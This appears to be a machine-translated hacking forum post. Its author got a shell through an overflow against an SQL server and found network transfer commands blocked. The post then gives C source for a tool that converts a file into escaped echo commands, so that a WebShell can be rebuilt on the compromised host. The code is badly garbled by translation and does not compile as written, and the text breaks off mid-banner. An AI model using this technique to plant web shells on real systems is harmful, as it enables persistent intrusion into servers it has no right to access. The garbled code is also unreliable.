When I was overflow with SQLHELLO, I got a shell and tried Trial AT. It can be executed, it seems to be admin privileges, but it can't use NET, FTP, TFTP command. Halo, how do you upload a document? Oh, okay, it is hard to me. Just on the hell on the command line Echo a WebShell and then do it. Although only Echo a few lines of applets, it is exhausted, so I use C to write a program to prepare it. The principle is very simple, that is, in each line of code, "echo", then ">> echofile.txt", pay attention to the special symbol (<,>, &, |, ", ^) before adding ^ code as follows: #include "stdio.h" #include #include void echo (char So [30], char sa [30]) {file * fp1, * fp2; char ch; if ((( FP1 = FOPEN (SO, "R")) == NULL) {Printf ("Don't open file% S / N", SO); exit (0);} // Open file IF to echo ((fp2 = FOPEN ("echofile.txt", "w")) == null) {Printf ("don't create file / n"); exit (0);} // Generate the result file echofile.txtFputs ("echo" , fp2); CH = fgetc (fp1); while (! feof (fp1)) // read one byte {if (CH == '^' || CH == '<' || CH from the ECHO file == '>' || CH == '| || CH ==' ") // Handle special symbol (ie before" ^ ") {FPUTC ('^' , FP2); FPUTC (CH, FP2);} Else If (CH == '/ n') // If it is established, it is at the end of the line; the end is added to the redirect statement ">> XXX" {fputs (">> ", fp2); FPUTS (SA, FP2); FPUTS (" / n ", fp2); FPUTS (" echo ", fp2);} else // other cases directly put characters to the result file {FPUTC (CH, FP2);} ch = fgetc (fp1);} fclose (fp1); fclose (fp2); Printf ("DONE! / N");} int main (int Argc, char * argv [] (=) {ix (argc! = 3) {printf ("/ n --------------------------------------------------------------------------------------------------- ------------------------- / N "); Printf (" | | echo file, by Lake2 (
http://mrhupo.126.com
